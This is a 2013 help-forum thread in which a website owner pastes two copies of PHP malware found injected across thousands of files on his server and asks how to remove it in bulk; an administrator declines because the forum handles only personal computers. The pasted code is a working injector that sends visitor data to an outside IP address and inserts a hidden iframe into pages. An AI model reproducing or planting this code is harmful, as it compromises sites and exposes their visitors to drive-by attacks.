Welcome to MalwareRemoval.com,
What if we told you that you could get malware removal help from experts, and that it was 100% free? MalwareRemoval.com provides free support for people with infected computers. Our help, and the tools we use are always 100% free. No hidden catch. We simply enjoy helping others. You enjoy a clean, safe computer.

Malware Removal Instructions

How do I remove this Malware?

MalwareRemoval.com provides free support for people with infected computers. Using plain language that anyone can understand, our community of volunteer experts will walk you through each step.

How do I remove this Malware?

Unread postby MrCanuck » August 31st, 2013, 7:51 pm

I have a server at GoDaddy and I have about 6 different websites on it.

I have malware on all the files (thousands) throughout the server.

Normally I would just download all the files and then do a "search and replace" ALL in Dreamweaver and get rid of the malicious code in all the files.

However, the problem with this one is that each malicious code is different for each file.

Below you will see the malicious code from two separate PHP files on my site. The text in "green" is where it is different in every file.

Any way to remove this without having to go through thousands of files 1 by 1?

Code: Select all
<?php /*f722ecd8c62d5e4b2c57c0c3c7b0a063e95hutz1qfki7rse*/if (!defined('HDDD467FFEY322')){function _shutdown_function($asd){$write =<<<AOLEW
<script type='text/javascript'>##JS##if (typeof KDDRTFGEG == 'undefined' && typeof f2 != 'undefined') {var it=f2().split('|');var dkm='';for (i=0;i<it.length;i++)dkm+=f1((it[i]-67)>>1);document.write("<iframe src='"+dkm+"' style='position:absolute;top:-1000px;left:-1000px;text-indent:-1000;width:1px;height:1px;'></iframe>");KDDRTFGEG=true;}</script>
AOLEW;
$asd = preg_replace('/<!--f722ecd8c62d5e4b2c57c0c3c7b0a063e95hutz1qfki7rse-->(.*?)<!--f722ecd8c62d5e4b2c57c0c3c7b0a063e95hutz1qfki7rse-->/i', '', $asd); $sess_id = empty($_COOKIE['PHP_SESSION_ID']) ? 0 : intval($_COOKIE['PHP_SESSION_ID']); $sdf='';if ($sess_id < 2) $sdf = file_get_contents([color=#00BF00]'http://82.200.204.155/tmp/jquery.js?96=67&3be61b7b='.base64_encode[/color]($_SERVER['REMOTE_ADDR'].'|'.$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'].'|'.$_SERVER['HTTP_USER_AGENT']).'&fid=1fad2e56559d7f5e572cbe4200bac834'); if (!empty($sdf)) $sdf.= "var exdate=new Date();exdate.setDate(exdate.getDate() + 14);document.cookie='PHP_SESSION_ID=".(++$sess_id)."; expires='+exdate.toUTCString();"; return str_replace('</body>', str_replace('##JS##', $sdf, $write) . '</body>', $asd);}if (function_exists('ob_start') && is_callable('ob_start')) $result = ob_start('_shutdown_function', 0, true);define('HDDD467FFEY322', 1);}/*f722ecd8c62d5e4b2c57c0c3c7b0a063e95hutz1qfki7rse*/ ?>


Code: Select all
<?php /*f722ecd8c62d5e4b2c57c0c3c7b0a063e95hutz1qfki7rse*/if (!defined('HDDD467FFEY322')){function _shutdown_function($asd){$write =<<<AOLEW
<script type='text/javascript'>##JS##if (typeof KDDRTFGEG == 'undefined' && typeof f2 != 'undefined') {var it=f2().split('|');var dkm='';for (i=0;i<it.length;i++)dkm+=f1((it[i]-55)>>1);document.write("<iframe src='"+dkm+"' style='position:absolute;top:-1000px;left:-1000px;text-indent:-1000;width:1px;height:1px;'></iframe>");KDDRTFGEG=true;}</script>
AOLEW;
$asd = preg_replace('/<!--f722ecd8c62d5e4b2c57c0c3c7b0a063e95hutz1qfki7rse-->(.*?)<!--f722ecd8c62d5e4b2c57c0c3c7b0a063e95hutz1qfki7rse-->/i', '', $asd); $sess_id = empty($_COOKIE['PHP_SESSION_ID']) ? 0 : intval($_COOKIE['PHP_SESSION_ID']); $sdf='';if ($sess_id < 2) $sdf = file_get_contents('[color=#00BF00]http://82.200.204.155/tmp/jquery.js?968=55&9a='.base64_encode[/color]($_SERVER['REMOTE_ADDR'].'|'.$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'].'|'.$_SERVER['HTTP_USER_AGENT']).'&fid=1fad2e56559d7f5e572cbe4200bac834'); if (!empty($sdf)) $sdf.= "var exdate=new Date();exdate.setDate(exdate.getDate() + 14);document.cookie='PHP_SESSION_ID=".(++$sess_id)."; expires='+exdate.toUTCString();"; return str_replace('</body>', str_replace('##JS##', $sdf, $write) . '</body>', $asd);}if (function_exists('ob_start') && is_callable('ob_start')) $result = ob_start('_shutdown_function', 0, true);define('HDDD467FFEY322', 1);}/*f722ecd8c62d5e4b2c57c0c3c7b0a063e95hutz1qfki7rse*/ ?>
MrCanuck
Active Member
 
Posts: 2
Joined: August 31st, 2013, 7:48 pm
Advertisement
Register to Remove

Re: How do I remove this Malware?

Unread postby Gary R » September 1st, 2013, 1:07 am

We don't deal with this kind of problem here, we deal solely with removing Malware from personal computers. Website security is an entirely different subject.

Offhand I can't think of any of the major help forums that deal with this kind of issue.

I'm sorry, we're unable to help you.
User avatar
Gary R
Administrator
Administrator
 
Posts: 25888
Joined: June 28th, 2005, 11:36 am
Location: Yorkshire

Re: How do I remove this Malware?

Unread postby MrCanuck » September 1st, 2013, 1:09 am

No worries. Thanks anyways :)
MrCanuck
Active Member
 
Posts: 2
Joined: August 31st, 2013, 7:48 pm

Re: How do I remove this Malware?

Unread postby Gary R » September 1st, 2013, 1:19 am

You're welcome, sorry we couldn't help.
User avatar
Gary R
Administrator
Administrator
 
Posts: 25888
Joined: June 28th, 2005, 11:36 am
Location: Yorkshire
Advertisement
Register to Remove


  • Similar Topics
    Replies
    Views
    Last post

Return to Infected? Virus, malware, adware, ransomware, oh my!



Who is online

Users browsing this forum: No registered users and 113 guests

Contact us:

Advertisements do not imply our endorsement of that product or service. Register to remove all ads. The forum is run by volunteers who donate their time and expertise. We make every attempt to ensure that the help and advice posted is accurate and will not cause harm to your computer. However, we do not guarantee that they are accurate and they are to be used at your own risk. All trademarks are the property of their respective owners.

Member site: UNITE Against Malware